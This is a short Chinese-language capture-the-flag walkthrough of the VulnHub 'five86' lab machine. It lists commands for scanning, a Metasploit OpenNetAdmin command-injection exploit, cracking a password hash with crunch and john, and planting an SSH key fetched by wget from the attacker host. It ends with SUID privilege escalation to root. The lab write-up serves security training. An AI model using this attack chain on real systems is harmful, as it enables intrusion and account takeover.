vulnhub之five86的实践

今天实践的是vulnhub的five86镜像，下载地址，

https://download.vulnhub.com/five86/Five86-1.zip，

用workstation导入成功，先做地址扫描，

sudo netdiscover -r 192.168.137.0/24，

接着做端口扫描，sudo nmap -sS -sV -T5 -A -p- 192.168.137.121，

直接访问扫描出来的url，http://192.168.137.121/ona，

去metasploit搜索可利用的攻击模块，search OpenNetAdmin，

use exploit/unix/webapp/opennetadmin_ping_cmd_injection

set RHOSTS 192.168.137.121

set LHOST 192.168.137.141

exploit

拿到shell，不是root，需要提权，转成可交互的shell，

python -c 'import pty; pty.spawn("/bin/bash")'，

查看到web目录下有个douglas账户，密码是哈希加密的，

给了提示，密码是10个字符，包含aefhrt，

使用crunch生成一个字典，crunch 10 10 aefhrt > dict.txt，

把密码的哈希值放到单独的文件里，

echo '$apr1$9fgG/hiM$BtsL9qpNHUlylaLxk81qY1' > hash，

用john进行破解，john --wordlist=./dict.txt hash，

得到密码明文，fatherrrrr，用账户douglas/fatherrrrr进行ssh登录，

sudo -l发现当前账户可以jen的权限执行cp命令，

用putty做个公私钥对儿，把公钥拷贝到kali攻击机上，authorized_keys，

kali攻击机上开启http下载服务，python2 -m SimpleHTTPServer，

在靶机上，cd /tmp，

wget http://192.168.137.141:8000/authorized_keys，

chmod 777 authorized_keys，

sudo -u jen /bin/cp authorized_keys /home/jen/.ssh，

再用putty以jen的账户通过公钥认证登录，

收到一封邮件，查看内容，得到账户，moss/Fire!Fire!，

再次以新的账户ssh登录，

查找以root权限执行的文件，find / -perm -u=s -type f 2>/dev/null，

看到有/home/moss/.games/upyourgame，

cd /home/moss/.games，./upyourgame，回答各种问题，得到新shell，

id确认一下是root，